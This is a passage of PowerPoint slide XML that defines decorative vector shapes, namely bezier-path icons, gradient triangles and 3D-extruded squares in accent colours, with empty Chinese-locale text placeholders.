                        <a:pt x="17617" y="19332"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="18051" y="19739"/>
                        <a:pt x="18489" y="20127"/>
                        <a:pt x="18921" y="20501"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="19107" y="20656"/>
                        <a:pt x="19328" y="20731"/>
                        <a:pt x="19601" y="20712"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="19861" y="20703"/>
                        <a:pt x="20090" y="20586"/>
                        <a:pt x="20269" y="20375"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="20455" y="20160"/>
                        <a:pt x="20532" y="19921"/>
                        <a:pt x="20503" y="19674"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="20477" y="19421"/>
                        <a:pt x="20371" y="19229"/>
                        <a:pt x="20192" y="19089"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="19755" y="18752"/>
                        <a:pt x="19321" y="18397"/>
                        <a:pt x="18884" y="18022"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="19626" y="17143"/>
                        <a:pt x="20221" y="16217"/>
                        <a:pt x="20664" y="15300"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="21103" y="14379"/>
                        <a:pt x="21367" y="13490"/>
                        <a:pt x="21453" y="12667"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="21540" y="11839"/>
                        <a:pt x="21439" y="11091"/>
                        <a:pt x="21159" y="10412"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="20880" y="9725"/>
                        <a:pt x="20386" y="9135"/>
                        <a:pt x="19678" y="8570"/>
                      </a:cubicBezTo>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15" name="AutoShape 54"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="8375650" y="2896394"/>
                  <a:ext cx="70644" cy="73819"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="+- 0 10791 197"/>
                    <a:gd name="T1" fmla="*/ T0 w 21188"/>
                    <a:gd name="T2" fmla="+- 0 10794 193"/>
                    <a:gd name="T3" fmla="*/ 10794 h 21203"/>
                    <a:gd name="T4" fmla="+- 0 10791 197"/>
                    <a:gd name="T5" fmla="*/ T4 w 21188"/>
                    <a:gd name="T6" fmla="+- 0 10794 193"/>
                    <a:gd name="T7" fmla="*/ 10794 h 21203"/>
                    <a:gd name="T8" fmla="+- 0 10791 197"/>
                    <a:gd name="T9" fmla="*/ T8 w 21188"/>
                    <a:gd name="T10" fmla="+- 0 10794 193"/>
                    <a:gd name="T11" fmla="*/ 10794 h 21203"/>
                    <a:gd name="T12" fmla="+- 0 10791 197"/>
                    <a:gd name="T13" fmla="*/ T12 w 21188"/>
                    <a:gd name="T14" fmla="+- 0 10794 193"/>
                    <a:gd name="T15" fmla="*/ 10794 h 21203"/>
                  </a:gdLst>
                  <a:ahLst/>
                  <a:cxnLst>
                    <a:cxn ang="0">
                      <a:pos x="T1" y="T3"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T5" y="T7"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T9" y="T11"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T13" y="T15"/>
                    </a:cxn>
                  </a:cxnLst>
                  <a:rect l="0" t="0" r="r" b="b"/>
                  <a:pathLst>
                    <a:path w="21188" h="21203">
                      <a:moveTo>
                        <a:pt x="17615" y="468"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="17606" y="468"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="14870" y="2476"/>
                        <a:pt x="12200" y="4590"/>
                        <a:pt x="9727" y="6958"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="7348" y="9227"/>
                        <a:pt x="5200" y="11619"/>
                        <a:pt x="3329" y="14060"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="341" y="17962"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="350" y="17970"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="-197" y="18786"/>
                        <a:pt x="-106" y="19880"/>
                        <a:pt x="638" y="20590"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="1491" y="21407"/>
                        <a:pt x="2889" y="21407"/>
                        <a:pt x="3746" y="20590"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="3877" y="20460"/>
                        <a:pt x="3984" y="20321"/>
                        <a:pt x="4069" y="20174"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="6867" y="16517"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="8601" y="14255"/>
                        <a:pt x="10606" y="12027"/>
                        <a:pt x="12824" y="9913"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="15281" y="7570"/>
                        <a:pt x="17557" y="5758"/>
                        <a:pt x="20329" y="3749"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="20321" y="3741"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="20400" y="3684"/>
                        <a:pt x="20473" y="3635"/>
                        <a:pt x="20543" y="3570"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="21402" y="2753"/>
                        <a:pt x="21402" y="1427"/>
                        <a:pt x="20543" y="606"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="19742" y="-161"/>
                        <a:pt x="18472" y="-193"/>
                        <a:pt x="17615" y="468"/>
                      </a:cubicBezTo>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16" name="AutoShape 55"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="8448675" y="2649538"/>
                  <a:ext cx="71438" cy="74613"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="+- 0 10803 213"/>
                    <a:gd name="T1" fmla="*/ T0 w 21180"/>
                    <a:gd name="T2" fmla="+- 0 10801 203"/>
                    <a:gd name="T3" fmla="*/ 10801 h 21196"/>
                    <a:gd name="T4" fmla="+- 0 10803 213"/>
                    <a:gd name="T5" fmla="*/ T4 w 21180"/>
                    <a:gd name="T6" fmla="+- 0 10801 203"/>
                    <a:gd name="T7" fmla="*/ 10801 h 21196"/>
                    <a:gd name="T8" fmla="+- 0 10803 213"/>
                    <a:gd name="T9" fmla="*/ T8 w 21180"/>
                    <a:gd name="T10" fmla="+- 0 10801 203"/>
                    <a:gd name="T11" fmla="*/ 10801 h 21196"/>
                    <a:gd name="T12" fmla="+- 0 10803 213"/>
                    <a:gd name="T13" fmla="*/ T12 w 21180"/>
                    <a:gd name="T14" fmla="+- 0 10801 203"/>
                    <a:gd name="T15" fmla="*/ 10801 h 21196"/>
                  </a:gdLst>
                  <a:ahLst/>
                  <a:cxnLst>
                    <a:cxn ang="0">
                      <a:pos x="T1" y="T3"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T5" y="T7"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T9" y="T11"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T13" y="T15"/>
                    </a:cxn>
                  </a:cxnLst>
                  <a:rect l="0" t="0" r="r" b="b"/>
                  <a:pathLst>
                    <a:path w="21180" h="21196">
                      <a:moveTo>
                        <a:pt x="8372" y="11356"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="6122" y="13508"/>
                        <a:pt x="3675" y="15444"/>
                        <a:pt x="1144" y="17292"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="963" y="17388"/>
                        <a:pt x="786" y="17493"/>
                        <a:pt x="637" y="17645"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="-213" y="18457"/>
                        <a:pt x="-213" y="19774"/>
                        <a:pt x="637" y="20585"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="1464" y="21380"/>
                        <a:pt x="2796" y="21397"/>
                        <a:pt x="3652" y="20641"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="3665" y="20649"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="6364" y="18673"/>
                        <a:pt x="8988" y="16581"/>
                        <a:pt x="11419" y="14263"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="13759" y="12030"/>
                        <a:pt x="15873" y="9685"/>
                        <a:pt x="17715" y="7283"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="20663" y="3427"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="20654" y="3419"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="21386" y="2600"/>
                        <a:pt x="21357" y="1379"/>
                        <a:pt x="20541" y="608"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="19697" y="-203"/>
                        <a:pt x="18323" y="-203"/>
                        <a:pt x="17468" y="608"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="17313" y="760"/>
                        <a:pt x="17197" y="937"/>
                        <a:pt x="17094" y="1114"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="14228" y="4857"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="12526" y="7090"/>
                        <a:pt x="10552" y="9275"/>
                        <a:pt x="8372" y="11356"/>
                      </a:cubicBezTo>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grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="25" name="Group 26"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="5338" y="2772"/>
              <a:ext cx="2054" cy="3672"/>
              <a:chOff x="5960997" y="2484779"/>
              <a:chExt cx="1304471" cy="2341845"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="26" name="Group 27"/>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="5960997" y="2484779"/>
                <a:ext cx="1304471" cy="2341845"/>
                <a:chOff x="5960997" y="2484779"/>
                <a:chExt cx="1304471" cy="2341845"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:grpSp>
              <p:nvGrpSpPr>
                <p:cNvPr id="28" name="Group 29"/>
                <p:cNvGrpSpPr>
                  <a:grpSpLocks noChangeAspect="1"/>
                </p:cNvGrpSpPr>
                <p:nvPr/>
              </p:nvGrpSpPr>
              <p:grpSpPr bwMode="auto">
                <a:xfrm>
                  <a:off x="5960997" y="2484779"/>
                  <a:ext cx="1304471" cy="1802479"/>
                  <a:chOff x="3149600" y="2480384"/>
                  <a:chExt cx="1201204" cy="1660005"/>
                </a:xfrm>
              </p:grpSpPr>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="30" name="等腰三角形 51"/>
                  <p:cNvSpPr/>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr>
                  <a:xfrm flipV="1">
                    <a:off x="3149600" y="3200883"/>
                    <a:ext cx="1201204" cy="939506"/>
                  </a:xfrm>
                  <a:prstGeom prst="triangle">
                    <a:avLst/>
                  </a:prstGeom>
                  <a:gradFill>
                    <a:gsLst>
                      <a:gs pos="0">
                        <a:schemeClr val="accent3"/>
                      </a:gs>
                      <a:gs pos="100000">
                        <a:srgbClr val="EEECE1">
                          <a:lumMod val="90000"/>
                          <a:alpha val="0"/>
                        </a:srgbClr>
                      </a:gs>
                    </a:gsLst>
                    <a:lin ang="5400000" scaled="0"/>
                  </a:gradFill>
                  <a:ln w="25400" cap="flat" cmpd="sng" algn="ctr">
                    <a:noFill/>
                    <a:prstDash val="solid"/>
                  </a:ln>
                  <a:effectLst/>
                </p:spPr>
                <p:txBody>
                  <a:bodyPr anchor="ctr"/>
                  <a:lstStyle/>
                  <a:p>
                    <a:pPr algn="ctr" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                      <a:spcBef>
                        <a:spcPts val="0"/>
                      </a:spcBef>
                      <a:spcAft>
                        <a:spcPts val="0"/>
                      </a:spcAft>
                      <a:defRPr/>
                    </a:pPr>
                    <a:endParaRPr lang="zh-CN" altLang="en-US" kern="0" dirty="0">
                      <a:solidFill>
                        <a:sysClr val="window" lastClr="FFFFFF"/>
                      </a:solidFill>
                      <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                      <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                    </a:endParaRPr>
                  </a:p>
                </p:txBody>
              </p:sp>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="31" name="矩形 52"/>
                  <p:cNvSpPr/>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr>
                  <a:xfrm>
                    <a:off x="3630724" y="2480384"/>
                    <a:ext cx="720080" cy="720080"/>
                  </a:xfrm>
                  <a:prstGeom prst="rect">
                    <a:avLst/>
                  </a:prstGeom>
                  <a:solidFill>
                    <a:schemeClr val="accent3"/>
                  </a:solidFill>
                  <a:ln w="9525" cap="flat" cmpd="sng" algn="ctr">
                    <a:noFill/>
                    <a:prstDash val="solid"/>
                  </a:ln>
                  <a:effectLst>
                    <a:outerShdw blurRad="40000" dist="23000" dir="5400000" rotWithShape="0">
                      <a:srgbClr val="000000">
                        <a:alpha val="35000"/>
                      </a:srgbClr>
                    </a:outerShdw>
                  </a:effectLst>
                  <a:scene3d>
                    <a:camera prst="isometricOffAxis2Top">
                      <a:rot lat="19390491" lon="18812960" rev="21592509"/>
                    </a:camera>
                    <a:lightRig rig="chilly" dir="t">
                      <a:rot lat="0" lon="0" rev="600000"/>
                    </a:lightRig>
                  </a:scene3d>
                  <a:sp3d extrusionH="666750"/>
                </p:spPr>
                <p:txBody>
                  <a:bodyPr anchor="ctr"/>
                  <a:lstStyle/>
                  <a:p>
                    <a:pPr algn="ctr" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                      <a:spcBef>
                        <a:spcPts val="0"/>
                      </a:spcBef>
                      <a:spcAft>
                        <a:spcPts val="0"/>
                      </a:spcAft>
                      <a:defRPr/>
                    </a:pPr>
                    <a:endParaRPr lang="zh-CN" altLang="en-US" kern="0" dirty="0">
                      <a:solidFill>
                        <a:sysClr val="window" lastClr="FFFFFF"/>
                      </a:solidFill>
                      <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                      <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                    </a:endParaRPr>
                  </a:p>
                </p:txBody>
              </p:sp>
            </p:grpSp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="29" name="Oval 30"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeAspect="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="6312532" y="4240732"/>
                  <a:ext cx="585892" cy="585892"/>
                </a:xfrm>
                <a:prstGeom prst="ellipse">
                  <a:avLst/>
                </a:prstGeom>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ln w="3810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id-ID"/>
                </a:p>
              </p:txBody>
            </p:sp>
          </p:grpSp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="27" name="AutoShape 112"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6453017" y="4367800"/>
                <a:ext cx="328308" cy="328869"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 10510 w 21020"/>
                  <a:gd name="T1" fmla="*/ 10800 h 21600"/>
                  <a:gd name="T2" fmla="*/ 10510 w 21020"/>
                  <a:gd name="T3" fmla="*/ 10800 h 21600"/>
                  <a:gd name="T4" fmla="*/ 10510 w 21020"/>
                  <a:gd name="T5" fmla="*/ 10800 h 21600"/>
                  <a:gd name="T6" fmla="*/ 10510 w 21020"/>
                  <a:gd name="T7" fmla="*/ 10800 h 21600"/>
                </a:gdLst>
                <a:ahLst/>
                <a:cxnLst>
                  <a:cxn ang="0">
                    <a:pos x="T0" y="T1"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T2" y="T3"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T4" y="T5"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T6" y="T7"/>
                  </a:cxn>
                </a:cxnLst>
                <a:rect l="0" t="0" r="r" b="b"/>
                <a:pathLst>
                  <a:path w="21020" h="21600">
                    <a:moveTo>
                      <a:pt x="18846" y="7946"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="17740" y="9091"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="17740" y="8939"/>
                      <a:pt x="17758" y="8792"/>
                      <a:pt x="17744" y="8636"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="17629" y="7331"/>
                      <a:pt x="17036" y="6068"/>
                      <a:pt x="16074" y="5080"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="15004" y="3980"/>
                      <a:pt x="13585" y="3348"/>
                      <a:pt x="12180" y="3345"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="13268" y="2218"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="13812" y="1659"/>
                      <a:pt x="14572" y="1350"/>
                      <a:pt x="15403" y="1350"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="16460" y="1350"/>
                      <a:pt x="17546" y="1840"/>
                      <a:pt x="18381" y="2696"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="19165" y="3500"/>
                      <a:pt x="19631" y="4499"/>
                      <a:pt x="19698" y="5510"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="19760" y="6453"/>
                      <a:pt x="19457" y="7317"/>
                      <a:pt x="18846" y="7946"/>
                    </a:cubicBezTo>
                    <a:moveTo>
                      <a:pt x="5828" y="19329"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="5813" y="18424"/>
                      <a:pt x="5454" y="17481"/>
                      <a:pt x="4730" y="16739"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4046" y="16034"/>
                      <a:pt x="3150" y="15628"/>
                      <a:pt x="2257" y="15592"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="2911" y="13157"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="2959" y="12995"/>
                      <a:pt x="3052" y="12835"/>
                      <a:pt x="3168" y="12695"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4485" y="11726"/>
                      <a:pt x="6512" y="12012"/>
                      <a:pt x="7920" y="13460"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9409" y="14990"/>
                      <a:pt x="9639" y="17230"/>
                      <a:pt x="8492" y="18568"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="8416" y="18609"/>
                      <a:pt x="8339" y="18648"/>
                      <a:pt x="8256" y="18675"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="8256" y="18675"/>
                      <a:pt x="5828" y="19329"/>
                      <a:pt x="5828" y="19329"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="2737" y="20164"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="2665" y="20181"/>
                      <a:pt x="2443" y="20239"/>
                      <a:pt x="2291" y="20249"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1751" y="20244"/>
                      <a:pt x="1313" y="19792"/>
                      <a:pt x="1313" y="19237"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1321" y="19124"/>
                      <a:pt x="1365" y="18929"/>
                      <a:pt x="1380" y="18857"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="2071" y="16283"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="2822" y="16261"/>
                      <a:pt x="3630" y="16562"/>
                      <a:pt x="4265" y="17215"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4911" y="17878"/>
                      <a:pt x="5214" y="18725"/>
                      <a:pt x="5181" y="19504"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="5181" y="19504"/>
                      <a:pt x="2737" y="20164"/>
                      <a:pt x="2737" y="20164"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="6888" y="11179"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="6280" y="10927"/>
                      <a:pt x="5642" y="10783"/>
                      <a:pt x="5004" y="10774"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="10063" y="5536"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="10838" y="4759"/>
                      <a:pt x="11966" y="4536"/>
                      <a:pt x="13077" y="4819"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="13077" y="4819"/>
                      <a:pt x="6888" y="11179"/>
                      <a:pt x="6888" y="11179"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="9717" y="13672"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="9473" y="13258"/>
                      <a:pt x="9194" y="12859"/>
                      <a:pt x="8848" y="12505"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="8447" y="12093"/>
                      <a:pt x="7986" y="11770"/>
                      <a:pt x="7507" y="11498"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="13767" y="5064"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="14259" y="5288"/>
                      <a:pt x="14729" y="5607"/>
                      <a:pt x="15145" y="6035"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="15500" y="6398"/>
                      <a:pt x="15775" y="6806"/>
                      <a:pt x="15987" y="7229"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="15987" y="7229"/>
                      <a:pt x="9717" y="13672"/>
                      <a:pt x="9717" y="13672"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="10519" y="16061"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="10465" y="15452"/>
                      <a:pt x="10298" y="14854"/>
                      <a:pt x="10047" y="14288"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="16257" y="7906"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="16637" y="9140"/>
                      <a:pt x="16442" y="10429"/>
                      <a:pt x="15610" y="11284"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="15604" y="11290"/>
                      <a:pt x="15598" y="11293"/>
                      <a:pt x="15593" y="11298"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="15602" y="11306"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10525" y="16565"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="10527" y="16397"/>
                      <a:pt x="10534" y="16232"/>
                      <a:pt x="10519" y="16061"/>
                    </a:cubicBezTo>
                    <a:moveTo>
                      <a:pt x="19308" y="1741"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="18228" y="632"/>
                      <a:pt x="16805" y="0"/>
                      <a:pt x="15403" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="14220" y="0"/>
                      <a:pt x="13131" y="450"/>
                      <a:pt x="12335" y="1266"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="9138" y="4577"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="9129" y="4585"/>
                      <a:pt x="9118" y="4592"/>
                      <a:pt x="9108" y="4602"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9103" y="4608"/>
                      <a:pt x="9100" y="4614"/>
                      <a:pt x="9095" y="4620"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="9096" y="4621"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2310" y="11647"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="1998" y="11966"/>
                      <a:pt x="1771" y="12364"/>
                      <a:pt x="1645" y="12797"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="102" y="18541"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="100" y="18557"/>
                      <a:pt x="0" y="19008"/>
                      <a:pt x="0" y="19237"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="20541"/>
                      <a:pt x="1030" y="21599"/>
                      <a:pt x="2302" y="21599"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2554" y="21599"/>
                      <a:pt x="3044" y="21475"/>
                      <a:pt x="3062" y="21473"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="8630" y="19969"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="9054" y="19839"/>
                      <a:pt x="9439" y="19604"/>
                      <a:pt x="9750" y="19283"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="19776" y="8899"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="21600" y="7023"/>
                      <a:pt x="21394" y="3881"/>
                      <a:pt x="19308" y="1741"/>
                    </a:cubicBezTo>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:schemeClr val="accent3"/>
              </a:solid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nvGrpSpPr>
            <p:cNvPr id="32" name="Group 33"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="2750" y="2772"/>
              <a:ext cx="2054" cy="3712"/>
              <a:chOff x="3269603" y="2494718"/>
              <a:chExt cx="1304471" cy="2340121"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="33" name="Group 34"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks noChangeAspect="1"/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="3269603" y="2494718"/>
                <a:ext cx="1304471" cy="1802479"/>
                <a:chOff x="3149600" y="2480384"/>
                <a:chExt cx="1201204" cy="1660005"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="38" name="等腰三角形 51"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm flipV="1">
                  <a:off x="3149600" y="3200883"/>
                  <a:ext cx="1201204" cy="939506"/>
                </a:xfrm>
                <a:prstGeom prst="triangle">
                  <a:avLst/>
                </a:prstGeom>
                <a:gradFill>
                  <a:gsLst>
                    <a:gs pos="0">
                      <a:schemeClr val="accent2"/>
                    </a:gs>
                    <a:gs pos="100000">
                      <a:srgbClr val="EEECE1">
                        <a:lumMod val="90000"/>
                        <a:alpha val="0"/>
                      </a:srgbClr>
                    </a:gs>
                  </a:gsLst>
                  <a:lin ang="5400000" scaled="0"/>
                </a:gradFill>
                <a:ln w="25400" cap="flat" cmpd="sng" algn="ctr">
                  <a:noFill/>
                  <a:prstDash val="solid"/>
                </a:ln>
                <a:effectLst/>
              </p:spPr>
              <p:txBody>
                <a:bodyPr anchor="ctr"/>
                <a:lstStyle/>
                <a:p>
                  <a:pPr algn="ctr" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                    <a:spcBef>
                      <a:spcPts val="0"/>
                    </a:spcBef>
                    <a:spcAft>
                      <a:spcPts val="0"/>
                    </a:spcAft>
                    <a:defRPr/>
                  </a:pPr>
                  <a:endParaRPr lang="zh-CN" altLang="en-US" kern="0" dirty="0">
                    <a:solidFill>
                      <a:sysClr val="window" lastClr="FFFFFF"/>
                    </a:solidFill>
                    <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                    <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                  </a:endParaRPr>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="39" name="矩形 52"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="3630724" y="2480384"/>
                  <a:ext cx="720080" cy="720080"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:ln w="9525" cap="flat" cmpd="sng" algn="ctr">
                  <a:noFill/>
                  <a:prstDash val="solid"/>
                </a:ln>
                <a:effectLst>
